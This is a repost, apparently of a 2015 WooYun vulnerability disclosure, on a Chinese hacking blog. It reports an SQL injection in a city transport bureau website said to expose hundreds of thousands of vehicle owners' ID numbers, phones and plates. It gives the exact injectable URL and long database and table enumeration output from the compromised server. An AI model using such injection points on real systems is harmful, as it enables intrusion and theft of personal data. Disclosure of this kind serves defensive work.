记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

某市交通局注入漏洞影响几十万车主信息(包括身份证号,电话号,车牌等)

2015-04-04 16:35

通辽市交通局注入漏洞 泄露几十万车主信息(包括身份证号,电话号,车牌等)



附上注入点:

www.tljt.gov.cn/zfxxgk/show.asp?id=327





a.png





可获得大量信息:



1.png





2.png





还有几十万的数据,不逐一列出

code 区域
Database: JTCMS

[41 tables]

+---------------------------------------------------+

| ExchangeClass |

| Tb_Advertisement |

| Tb_Article_Workflow |

| Tb_BackupInfo |

| Tb_Bulletin |

| Tb_Class |

| Tb_Class_WorkFlow |

| Tb_Download |

| Tb_EmailClass |

| Tb_EmailRecord |

| Tb_Exchange |

| Tb_ExchangeClass |

| Tb_ExchangeUser |

| Tb_Group |

| Tb_ItemStyle |

| Tb_Link |

| Tb_Log |

| Tb_MemberInfo |

| Tb_News |

| Tb_NewsLink |

| Tb_PictureSort |

| Tb_Pictures |

| Tb_Popedom |

| Tb_Questionnaire |

| Tb_Result |

| Tb_RssClass |

| Tb_RssDoc |

| Tb_RssFeedPara |

| Tb_Site |

| Tb_Statistic |

| Tb_SysPara |

| Tb_Tag |

| Tb_Templates |

| Tb_Topic |

| Tb_User |

| Tb_UserStatistic |

| Tb_VisitStat |

| V_ClassFlow_User |

| V_Group_Popedom |

| V_User_Popedom |

| dtproperties |

+---------------------------------------------------+



Database: master

[290 tables]

+---------------------------------------------------+

| INFORMATION_SCHEMA.CHECK_CONSTRAINTS |

| INFORMATION_SCHEMA.COLUMNS |

| INFORMATION_SCHEMA.COLUMN_DOMAIN_USAGE |

| INFORMATION_SCHEMA.COLUMN_PRIVILEGES |

| INFORMATION_SCHEMA.CONSTRAINT_COLUMN_USAGE |

| INFORMATION_SCHEMA.CONSTRAINT_TABLE_USAGE |

| INFORMATION_SCHEMA.DOMAINS |

| INFORMATION_SCHEMA.DOMAIN_CONSTRAINTS |

| INFORMATION_SCHEMA.KEY_COLUMN_USAGE |

| INFORMATION_SCHEMA.PARAMETERS |

| INFORMATION_SCHEMA.REFERENTIAL_CONSTRAINTS |

| INFORMATION_SCHEMA.ROUTINES |

| INFORMATION_SCHEMA.ROUTINE_COLUMNS |

| INFORMATION_SCHEMA.SCHEMATA |

| INFORMATION_SCHEMA.TABLES |

| INFORMATION_SCHEMA.TABLE_CONSTRAINTS |

| INFORMATION_SCHEMA.TABLE_PRIVILEGES |

| INFORMATION_SCHEMA.VIEWS |

| INFORMATION_SCHEMA.VIEW_COLUMN_USAGE |

| INFORMATION_SCHEMA.VIEW_TABLE_USAGE |

| MSreplication_options |

| spt_fallback_db |

| spt_fallback_dev |

| spt_fallback_usg |

| spt_monitor |

| spt_values |

| sys.all_columns |

| sys.all_objects |

| sys.all_parameters |

| sys.all_sql_modules |

| sys.all_views |

| sys.allocation_units |

| sys.assemblies |

| sys.assembly_files |

| sys.assembly_modules |

| sys.assembly_references |

| sys.assembly_types |

| sys.asymmetric_keys |

| sys.backup_devices |

| sys.certificates |

| sys.check_constraints |

| sys.column_type_usages |

| sys.column_xml_schema_collection_usages |

| sys.columns |

| sys.computed_columns |

| sys.configurations |

| sys.conversation_endpoints |

| sys.conversation_groups |

| sys.credentials |

| sys.crypt_properties |

| sys.data_spaces |

| sys.database_files |

| sys.database_mirroring |

| sys.database_mirroring_endpoints |

| sys.database_mirroring_witnesses |

| sys.database_permissions |

| sys.database_principal_aliases |

| sys.database_principals |

| sys.database_recovery_status |

| sys.database_role_members |

| sys.databases |

| sys.default_constraints |

| sys.destination_data_spaces |

| sys.dm_broker_activated_tasks |

| sys.dm_broker_connections |

| sys.dm_broker_forwarded_messages |

| sys.dm_broker_queue_monitors |

| sys.dm_clr_appdomains |

| sys.dm_clr_loaded_assemblies |

| sys.dm_clr_properties |

| sys.dm_clr_tasks |

| sys.dm_db_file_space_usage |

| sys.dm_db_index_usage_stats |

| sys.dm_db_mirroring_connections |

| sys.dm_db_missing_index_details |

| sys.dm_db_missing_index_group_stats |

| sys.dm_db_missing_index_groups |

| sys.dm_db_partition_stats |

| sys.dm_db_session_space_usage |

| sys.dm_db_task_space_usage |

| sys.dm_exec_background_job_queue |

| sys.dm_exec_background_job_queue_stats |

| sys.dm_exec_cached_plans |

| sys.dm_exec_connections |

| sys.dm_exec_query_optimizer_info |

| sys.dm_exec_query_stats |

| sys.dm_exec_query_transformation_stats |

| sys.dm_exec_requests |

| sys.dm_exec_sessions |

| sys.dm_fts_active_catalogs |

| sys.dm_fts_index_population |

| sys.dm_fts_memory_buffers |

| sys.dm_fts_memory_pools |

| sys.dm_fts_population_ranges |

| sys.dm_io_backup_tapes |

| sys.dm_io_cluster_shared_drives |

| sys.dm_io_pending_io_requests |

| sys.dm_os_buffer_descriptors |

| sys.dm_os_child_instances |

| sys.dm_os_cluster_nodes |

| sys.dm_os_hosts |

| sys.dm_os_latch_stats |

| sys.dm_os_loaded_modules |

| sys.dm_os_memory_allocations |

| sys.dm_os_memory_cache_clock_hands |

| sys.dm_os_memory_cache_counters |

| sys.dm_os_memory_cache_entries |

| sys.dm_os_memory_cache_hash_tables |

| sys.dm_os_memory_clerks |

| sys.dm_os_memory_objects |

| sys.dm_os_memory_pools |

| sys.dm_os_performance_counters |

| sys.dm_os_ring_buffers |

| sys.dm_os_schedulers |

| sys.dm_os_stacks |

| sys.dm_os_sublatches |

| sys.dm_os_sys_info |

| sys.dm_os_tasks |

| sys.dm_os_threads |

| sys.dm_os_virtual_address_dump |

| sys.dm_os_wait_stats |

| sys.dm_os_waiting_tasks |

| sys.dm_os_worker_local_storage |

| sys.dm_os_workers |

| sys.dm_qn_subscriptions |

| sys.dm_repl_articles |

| sys.dm_repl_schemas |

| sys.dm_repl_tranhash |

| sys.dm_repl_traninfo |

| sys.dm_tran_active_snapshot_database_transactions |

| sys.dm_tran_active_transactions |

| sys.dm_tran_current_snapshot |

| sys.dm_tran_current_transaction |

| sys.dm_tran_database_transactions |

| sys.dm_tran_locks |

| sys.dm_tran_session_transactions |

| sys.dm_tran_top_version_generators |

| sys.dm_tran_transactions_snapshot |

| sys.dm_tran_version_store |

| sys.endpoint_webmethods |

| sys.endpoints |

| sys.event_notification_event_types |

| sys.event_notifications |

| sys.events |

| sys.extended_procedures |

| sys.extended_properties |

| sys.filegroups |

| sys.foreign_key_columns |

| sys.foreign_keys |

| sys.fulltext_catalogs |

| sys.fulltext_document_types |

| sys.fulltext_index_catalog_usages |

| sys.fulltext_index_columns |

| sys.fulltext_indexes |

| sys.fulltext_languages |

| sys.http_endpoints |

| sys.identity_columns |

| sys.index_columns |

| sys.indexes |

| sys.internal_tables |

| sys.key_constraints |

| sys.key_encryptions |

| sys.linked_logins |

| sys.login_token |

| sys.master_files |

| sys.master_key_passwords |

| sys.message_type_xml_schema_collection_usages |

| sys.messages |

| sys.module_assembly_usages |

| sys.numbered_procedure_parameters |

| sys.numbered_procedures |

| sys.objects |

| sys.openkeys |

| sys.parameter_type_usages |

| sys.parameter_xml_schema_collection_usages |

| sys.parameters |

| sys.partition_functions |

| sys.partition_parameters |

| sys.partition_range_values |

| sys.partition_schemes |

| sys.partitions |

| sys.plan_guides |

| sys.procedures |

| sys.remote_logins |

| sys.remote_service_bindings |

| sys.routes |

| sys.schemas |

| sys.securable_classes |

| sys.server_assembly_modules |

| sys.server_event_notifications |

| sys.server_events |

| sys.server_permissions |

| sys.server_principals |

| sys.server_role_members |

| sys.server_sql_modules |

| sys.server_trigger_events |

| sys.server_triggers |

| sys.servers |

| sys.service_broker_endpoints |

| sys.service_contract_message_usages |

| sys.service_contract_usages |

| sys.service_contracts |

| sys.service_message_types |

| sys.service_queue_usages |

| sys.service_queues |

| sys.services |

| sys.soap_endpoints |

| sys.sql_dependencies |

| sys.sql_logins |

| sys.sql_modules |

| sys.stats |

| sys.stats_columns |

| sys.symmetric_keys |

| sys.synonyms |

| sys.sysaltfiles |

| sys.syscacheobjects |

| sys.syscharsets |

| sys.syscolumns |

| sys.syscomments |

| sys.sysconfigures |

| sys.sysconstraints |

| sys.syscurconfigs |

| sys.syscursorcolumns |

| sys.syscursorrefs |

| sys.syscursors |

| sys.syscursortables |

| sys.sysdatabases |

| sys.sysdepends |

| sys.sysdevices |

| sys.sysfilegroups |

| sys.sysfiles |

| sys.sysforeignkeys |

| sys.sysfulltextcatalogs |

| sys.sysindexes |

| sys.sysindexkeys |

| sys.syslanguages |

| sys.syslockinfo |

| sys.syslogins |

| sys.sysmembers |

| sys.sysmessages |

| sys.sysobjects |

| sys.sysoledbusers |

| sys.sysopentapes |

| sys.sysperfinfo |

| sys.syspermissions |

| sys.sysprocesses |

| sys.sysprotects |

| sys.sysreferences |

| sys.sysremotelogins |

| sys.syssegments |

| sys.sysservers |

| sys.system_columns |

| sys.system_components_surface_area_configuration |

| sys.system_internals_allocation_units |

| sys.system_internals_partition_columns |

| sys.system_internals_partitions |

| sys.system_objects |

| sys.system_parameters |

| sys.system_sql_modules |

| sys.system_views |

| sys.systypes |

| sys.sysusers |

| sys.tables |

| sys.tcp_endpoints |

| sys.trace_categories |

| sys.trace_columns |

| sys.trace_event_bindings |

| sys.trace_events |

| sys.trace_subclass_values |

| sys.traces |

| sys.transmission_queue |

| sys.trigger_events |

| sys.triggers |

| sys.type_assembly_usages |

| sys.types |

| sys.user_token |

| sys.via_endpoints |

| sys.views |

| sys.xml_indexes |

| sys.xml_schema_attributes |

| sys.xml_schema_collections |

| sys.xml_schema_component_placements |

| sys.xml_schema_components |

| sys.xml_schema_elements |

| sys.xml_schema_facets |

| sys.xml_schema_model_groups |

| sys.xml_schema_namespaces |

| sys.xml_schema_types |

| sys.xml_schema_wildcard_namespaces |

| sys.xml_schema_wildcards |

+---------------------------------------------------+



Database: TLYGCMS

[45 tables]

+---------------------------------------------------+

| Tb_Advertisement |

| Tb_Areas |

| Tb_Article_Workflow |

| Tb_BackupInfo |

| Tb_Bulletin |

| Tb_Class |

| Tb_Class_WorkFlow |

| Tb_Download |

| Tb_EmailClass |

| Tb_EmailRecord |

| Tb_Exchange |

| Tb_ExchangeClass |

| Tb_ExchangeUser |

| Tb_Group |

| Tb_InfoPublic |

| Tb_InfoPublicAudit |

| Tb_InfoPublicCate |

| Tb_ItemStyle |

| Tb_Link |

| Tb_Log |

| Tb_MemberInfo |

| Tb_News |

| Tb_NewsComment |

| Tb_NewsLink |

| Tb_PictureSort |

| Tb_Pictures |

| Tb_Popedom |

| Tb_Questionnaire |

| Tb_Result |

| Tb_RssClass |

| Tb_RssDoc |

| Tb_RssFeedPara |

| Tb_Site |

| Tb_Statistic |

| Tb_SysPara |

| Tb_Tag |

| Tb_Templates |

| Tb_Topic |

| Tb_User |

| Tb_UserStatistic |

| Tb_VisitStat |

| V_ClassFlow_User |

| V_Group_Popedom |

| V_User_Popedom |

| dtproperties |

+---------------------------------------------------+



Database: msdb

[92 tables]

+---------------------------------------------------+

| MSdatatype_mappings |

| MSdbms |

| MSdbms_datatype |

| MSdbms_datatype_mapping |

| MSdbms_map |

| backupfile |

| backupfilegroup |

| backupmediafamily |

| backupmediaset |

| backupset |

| log_shipping_monitor_alert |

| log_shipping_monitor_error_detail |

| log_shipping_monitor_history_detail |

| log_shipping_monitor_primary |

| log_shipping_monitor_secondary |

| log_shipping_primaries |

| log_shipping_primary_databases |

| log_shipping_primary_secondaries |

| log_shipping_secondaries |

| log_shipping_secondary |

| log_shipping_secondary_databases |

| logmarkhistory |

| restorefile |

| restorefilegroup |

| restorehistory |

| sqlagent_info |

| suspect_pages |

| sysalerts |

| syscachedcredentials |

| syscategories |

| sysdatatypemappings |

| sysdbmaintplan_databases |

| sysdbmaintplan_history |

| sysdbmaintplan_jobs |

| sysdbmaintplans |

| sysdownloadlist |

| sysdtscategories |

| sysdtslog90 |

| sysdtspackagefolders90 |

| sysdtspackagelog |

| sysdtspackages |

| sysdtspackages90 |

| sysdtssteplog |

| sysdtstasklog |

| sysjobactivity |

| sysjobhistory |

| sysjobs |

| sysjobs_view |

| sysjobschedules |

| sysjobservers |

| sysjobsteps |

| sysjobstepslogs |

| sysmail_account |

| sysmail_allitems |

| sysmail_attachments |

| sysmail_attachments_transfer |

| sysmail_configuration |

| sysmail_event_log |

| sysmail_faileditems |

| sysmail_log |

| sysmail_mailattachments |

| sysmail_mailitems |

| sysmail_principalprofile |

| sysmail_profile |

| sysmail_profileaccount |

| sysmail_query_transfer |

| sysmail_send_retries |

| sysmail_sentitems |

| sysmail_server |

| sysmail_servertype |

| sysmail_unsentitems |

| sysmaintplan_log |

| sysmaintplan_logdetail |

| sysmaintplan_plans |

| sysmaintplan_subplans |

| sysnotifications |

| sysoperators |

| sysoriginatingservers |

| sysoriginatingservers_view |

| sysproxies |

| sysproxylogin |

| sysproxyloginsubsystem_view |

| sysproxysubsystem |

| sysschedules |

| sysschedules_localserver_view |

| syssessions |

| syssubsystems |

| systargetservergroupmembers |

| systargetservergroups |

| systargetservers |

| systargetservers_view |

| systaskids |

+---------------------------------------------------+



Database: PublicInfo

[9 tables]

+---------------------------------------------------+

| GJ_File |

| GJ_user |

| InfoClass |

| admin |

| check |

| class |

| dtproperties |

| publicInfo |

| user |

+---------------------------------------------------+





点到为止

漏洞证明:

已证明

修复方案:

过滤

知识来源: www.wooyun.org/bugs/wooyun-2015-097685

阅读:80355 | 评论:0 | 标签:注入 漏洞

想收藏或者和大家分享这篇好文章→复制链接地址

“某市交通局注入漏洞影响几十万车主信息(包括身份证号,电话号,车牌等)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云